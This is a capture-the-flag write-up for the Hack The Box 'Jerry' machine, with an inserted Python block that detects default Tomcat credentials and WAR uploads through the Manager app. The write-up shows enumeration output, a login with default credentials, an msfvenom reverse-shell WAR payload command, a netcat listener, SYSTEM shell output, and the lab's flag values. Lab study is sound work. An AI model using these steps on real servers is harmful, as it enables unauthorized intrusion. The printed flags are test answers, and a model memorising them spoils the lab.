
Summary

A penetration tester successfully exploits a vulnerability in Apache Tomcat 7.0.88 on the Jerry machine hosted by Hack The Box (HTB), leading to remote code execution and system-level shell access.

Abstract

The writeup outlines a penetration testing scenario where the tester targets the Jerry machine on HTB. An initial Nmap scan identifies an exposed Apache Tomcat server running version 7.0.88. Using searchsploit, the tester finds known vulnerabilities for this version, specifically a JSP Upload Bypass leading to Remote Code Execution. Fuzzing with ffuf reveals accessible directories, including a /manager directory. The tester successfully logs in to the Tomcat Manager web application using default credentials (tomcat:s3cret). With access to the manager, the tester crafts a malicious WAR file using msfvenom to gain a reverse shell. After uploading the payload and listening with netcat, the tester achieves a shell with nt authority\system privileges. The final step involves locating the flags on the Administrator's desktop, concluding the machine's compromise.

Opinions

  • The author implies that default credentials are a common security oversight, as evidenced by the successful login to the Tomcat Manager using tomcat:s3cret.
  • The use of searchsploit and msfvenom suggests a reliance on well-known security tools to identify and exploit vulnerabilities.
  • The mention of the /manager directory being "interesting" indicates the author's view that management interfaces are valuable targets for penetration testers.
  • The tester's approach to gaining system-level access by exploiting a known vulnerability in an outdated version of Apache Tomcat underscores the importance of keeping software up to date to mitigate security risks.
  • The presence of flags in the Administrator's desktop directory is indicative of a common practice in CTF (Capture The Flag) challenges and penetration testing labs, where flags serve as proof of compromise.

HTB — Jerry

What do you say, Tom, can you catch me?

Starting with an Nmap scan, we find 1 open port:

# Nmap 7.93 scan initiated Wed Jan 24 01:18:54 2024 as: nmap -sV -sC -Pn -p 8080 -o nmap.txt jerry.htb
Nmap scan report for jerry.htb (10.129.145.195)
Host is up (0.097s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 24 01:19:06 2024 -- 1 IP address (1 host up) scanned in 12.54 seconds

Let's check whether the installed version of Apache Tomcat has known, publicly documented vulnerabilities:

$ searchsploit Tomcat 7.0.88
------------------------------------------------------------------------------------------------------------ ---------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
------------------------------------------------------------------------------------------------------------ ---------------------------
Shellcodes: No Results

Fuzzing the address gave us a few directories to look at:

$ ./ffuf -w /usr/share/wordlists/dirb/big.txt -u http://jerry.htb:8080/FUZZ -o ../fuzzed.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://jerry.htb:8080/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Output file      : ../fuzzed.txt
 :: File format      : json
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
docs                    [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
examples                [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
favicon.ico             [Status: 200, Size: 21630, Words: 19, Lines: 22, Duration: 107ms]
lpt1                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]
lpt2                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
manager                 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]
nul                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
prn                     [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
:: Progress: [20469/20469] :: Job [1/1] :: 395 req/sec :: Duration: [0:00:54] :: Errors: 0 ::

The /manager directory seems interesting, and perhaps we can use some default credentials to log in. In this case we can try the username:password combination tomcat:s3cret to log in to the management webapp.

Once inside we see an upload section which we can use to our advantage, but we can only upload WAR files, so let's craft a payload for it, which you can find here

For simplicity's sake, the line we are looking for is this (replace the placeholders with your listener's IP and port):

msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war

Now all we have to do is upload our payload and start the listener in our terminal using netcat:

nc -lvnp <LPORT>

And with that we get a shell as nt authority\system on the machine:

$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.154.214.
Ncat: Connection from 10.129.154.214:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04
 Directory of C:\apache-tomcat-7.0.88
06/19/2018  03:07 AM    <DIR>          .
06/19/2018  03:07 AM    <DIR>          ..
06/19/2018  03:06 AM    <DIR>          bin
06/19/2018  05:47 AM    <DIR>          conf
06/19/2018  03:06 AM    <DIR>          lib
05/07/2018  01:16 PM            57,896 LICENSE
01/25/2024  10:26 PM    <DIR>          logs
05/07/2018  01:16 PM             1,275 NOTICE
05/07/2018  01:16 PM             9,600 RELEASE-NOTES
05/07/2018  01:16 PM            17,454 RUNNING.txt
06/19/2018  03:06 AM    <DIR>          temp
01/25/2024  10:38 PM    <DIR>          webapps
06/19/2018  03:34 AM    <DIR>          work
               4 File(s)         86,225 bytes
               9 Dir(s)   2,420,121,600 bytes free
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
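From the defender's side, the two steps above that leave evidence are the documented default credential on a Manager role and the WAR upload through the Manager app. The Python below is an added example, not part of the original writeup: the tomcat-users.xml, the access-log lines and the default-credential set are constructed samples, and the deployment paths assume Tomcat's standard HTML and text Manager endpoints.

```python
import re
import xml.etree.ElementTree as ET
# Constructed sample tomcat-users.xml: the documented example pair tomcat:s3cret
# (the one used in the writeup) plus a privileged account with a strong password.
SAMPLE_USERS_XML = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deploy" password="Xk9!vQ2#mL8pR4wz" roles="manager-script"/>
</tomcat-users>"""

# Pairs that ship in Tomcat's example config and in every default-credential
# scanner; a real audit would load a fuller list (this one is a constructed sample).
KNOWN_DEFAULTS = {("tomcat", "s3cret"), ("tomcat", "tomcat"), ("admin", "admin")}
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui"}
def audit_tomcat_users(xml_text):
    """Return (username, reason) for accounts that can reach the Manager app
    with a default or short password; unprivileged users are ignored."""
    findings = []
    for user in ET.fromstring(xml_text).iter("user"):
        name, pw = user.get("username", ""), user.get("password", "")
        roles = {r.strip() for r in user.get("roles", "").split(",")}
        if not roles & PRIVILEGED_ROLES:
            continue  # cannot deploy code, so not in scope for this check
        if (name, pw) in KNOWN_DEFAULTS:
            findings.append((name, "documented default credential"))
        elif len(pw) < 12:
            findings.append((name, "short password on privileged role"))
    return findings

# Constructed lines in the default AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b):
# a failed auth, a login, the WAR upload, then the first hit on the deployed app.
SAMPLE_ACCESS_LOG = """\
10.10.14.7 - - [25/Jan/2024:22:37:10 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.7 - tomcat [25/Jan/2024:22:37:41 +0000] "GET /manager/html HTTP/1.1" 200 19102
10.10.14.7 - tomcat [25/Jan/2024:22:38:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19544
10.10.14.7 - - [25/Jan/2024:22:38:05 +0000] "GET /revshell/ HTTP/1.1" 200 0
"""
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3})')
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy", "/manager/deploy"}
def find_manager_deploys(log_text):
    """Return (client_ip, user, timestamp, path) for successful POST/PUT requests
    to a Manager deployment endpoint: the event that precedes a WAR-based shell."""
    hits = []
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, user, ts, method, path, status = m.groups()
        path = path.split("?")[0]  # drop the CSRF nonce / query string
        if status == "200" and method in ("POST", "PUT") and path in DEPLOY_PATHS:
            hits.append((ip, user, ts, path))
    return hits
```

Run against a live server's conf/tomcat-users.xml and logs/localhost_access_log.*.txt, the first function finds the exact weakness used in this writeup and the second surfaces the upload that delivered the WAR.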

All that's left is to find the flags, which are in the Administrator's Desktop folder; that finishes this machine:

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e